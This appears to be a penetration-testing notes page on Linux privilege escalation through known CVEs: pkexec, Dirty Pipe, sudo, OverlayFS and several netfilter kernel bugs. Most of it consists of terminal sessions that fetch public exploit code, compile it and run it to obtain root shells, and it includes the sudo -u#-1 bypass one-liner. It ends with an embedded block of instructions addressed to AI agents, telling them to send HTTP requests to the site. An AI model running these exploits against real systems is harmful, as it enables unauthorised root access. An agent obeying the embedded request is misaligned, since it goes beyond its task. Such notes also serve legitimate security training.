# Critical Vulnerabilities ## **Polkit (**CVE-2021-4034**)** {% embed url="" %} ```bash #pkexec has assigned setuid means is vulnerable cry0l1t3@nix02:~$ ls -la /usr/bin/pkexec -rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec cry0l1t3@nix02:~$ git clone https://github.com/arthepsy/CVE-2021-4034.git cry0l1t3@nix02:~$ cd CVE-2021-4034 cry0l1t3@nix02:~$ gcc cve-2021-4034-poc.c -o poc -static cry0l1t3@nix02:~$ ./poc # id uid=0(root) gid=0(root) groups=0(root) ``` ## **Dirty Pipe (**CVE-2022-0847**)** All kernels from version `5.8` to `5.17` are affected and vulnerable to this vulnerability. ```bash cry0l1t3@nix02:~$ git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git cry0l1t3@nix02:~$ cd CVE-2022-0847-DirtyPipe-Exploits cry0l1t3@nix02:~$ bash compile.sh ``` ## **Sudo privilege escalation** ### **CVE-2021-3156** One of the latest vulnerabilities for `sudo` carries the CVE-2021-3156 and is based on a heap-based buffer overflow vulnerability. This affected the sudo versions: * 1.8.31 - Ubuntu 20.04 * 1.8.27 - Debian 10 * 1.9.2 - Fedora 33 * and others ### [CVE-2019-14287](https://www.sudo.ws/security/advisories/minus_1_uid/) Sudo versions prior to 1.8.28 are affected. ```bash htb-student@NIX02:~$ sudo -l Matching Defaults entries for htb-student on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User htb-student may run the following commands on ubuntu: (ALL, !root) /bin/ncdu ``` ```bash htb-student@ubuntu:/dev/shm$ sudo -u#-1 /bin/ncdu input: b # id # uid=0(root) gid=1001(htb-student) groups=1001(htb-student) ``` ## Ubuntu OverlayFS Local Privesc CVE-2021-3493 Affected Version * Ubuntu 20.10 * Ubuntu 20.04 LTS * Ubuntu 19.04 * Ubuntu 18.04 LTS * Ubuntu 16.04 LTS * Ubuntu 14.04 ESM ```sh git clone https://github.com/briskets/CVE-2021-3493.git cd CVE-2021-3493 gcc exploit.c -o exploit -static ./exploit ``` ## **Netfilter** ### **CVE-2021-22555** Vulnerable kernel versions: 2.6 - 5.11 ```bash cry0l1t3@ubuntu:~$ wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c cry0l1t3@ubuntu:~$ gcc -m32 -static exploit.c -o exploit cry0l1t3@ubuntu:~$ ./exploit [+] Linux Privilege Escalation by theflow@ - 2021 [+] STAGE 0: Initialization [*] Setting up namespace sandbox... [*] Initializing sockets and message queues... [+] STAGE 1: Memory corruption [*] Spraying primary messages... [*] Spraying secondary messages... [*] Creating holes in primary messages... [*] Triggering out-of-bounds write... [*] Searching for corrupted primary message... [+] fake_idx: fff [+] real_idx: fdf ...SNIP... root@ubuntu:/home/cry0l1t3# id uid=0(root) gid=0(root) groups=0(root) ``` ### **CVE-2022-25636** A recent vulnerability is [CVE-2022-25636](https://www.cvedetails.com/cve/CVE-2022-25636/) and affects Linux kernel 5.4 through 5.6.10. ```bash cry0l1t3@ubuntu:~$ git clone https://github.com/Bonfee/CVE-2022-25636.git cry0l1t3@ubuntu:~$ cd CVE-2022-25636 cry0l1t3@ubuntu:~$ make cry0l1t3@ubuntu:~$ ./exploit [*] STEP 1: Leak child and parent net_device [+] parent net_device ptr: 0xffff991285dc0000 [+] child net_device ptr: 0xffff99128e5a9000 [*] STEP 2: Spray kmalloc-192, overwrite msg_msg.security ptr and free net_device [+] net_device struct freed [*] STEP 3: Spray kmalloc-4k using setxattr + FUSE to realloc net_device [+] obtained net_device struct [*] STEP 4: Leak kaslr [*] kaslr leak: 0xffffffff823093c0 [*] kaslr base: 0xffffffff80ffefa0 [*] STEP 5: Release setxattrs, free net_device, and realloc it again [+] obtained net_device struct [*] STEP 6: rop :) # id uid=0(root) gid=0(root) groups=0(root) ``` ### **CVE-2023-32233** This vulnerability exploits the so called `anonymous sets` in `nf_tables` by using the `Use-After-Free` vulnerability in the Linux Kernel up to version `6.3.1`. ```bash cry0l1t3@ubuntu:~$ git clone https://github.com/Liuk3r/CVE-2023-32233 cry0l1t3@ubuntu:~$ cd CVE-2023-32233 cry0l1t3@ubuntu:~/CVE-2023-32233$ gcc -Wall -o exploit exploit.c -lmnl -lnftnl cry0l1t3@ubuntu:~/CVE-2023-32233$ ./exploit [*] Netfilter UAF exploit Using profile: ======== 1 race_set_slab # {0,1} 1572 race_set_elem_count # k 4000 initial_sleep # ms 100 race_lead_sleep # ms 600 race_lag_sleep # ms 100 reuse_sleep # ms 39d240 free_percpu # hex 2a8b900 modprobe_path # hex 23700 nft_counter_destroy # hex 347a0 nft_counter_ops # hex a nft_counter_destroy_call_offset # hex ffffffff nft_counter_destroy_call_mask # hex e8e58948 nft_counter_destroy_call_check # hex ======== [*] Checking for available CPUs... [*] sched_getaffinity() => 0 2 [*] Reserved CPU 0 for PWN Worker [*] Started cpu_spinning_loop() on CPU 1 [*] Started cpu_spinning_loop() on CPU 2 [*] Started cpu_spinning_loop() on CPU 3 [*] Creating "/tmp/modprobe"... [*] Creating "/tmp/trigger"... [*] Updating setgroups... [*] Updating uid_map... [*] Updating gid_map... [*] Signaling PWN Worker... [*] Waiting for PWN Worker... ...SNIP... [*] You've Got ROOT:-) # id uid=0(root) gid=0(root) groups=0(root) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/linux-penetration-testing/critical-vulnerabilities.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.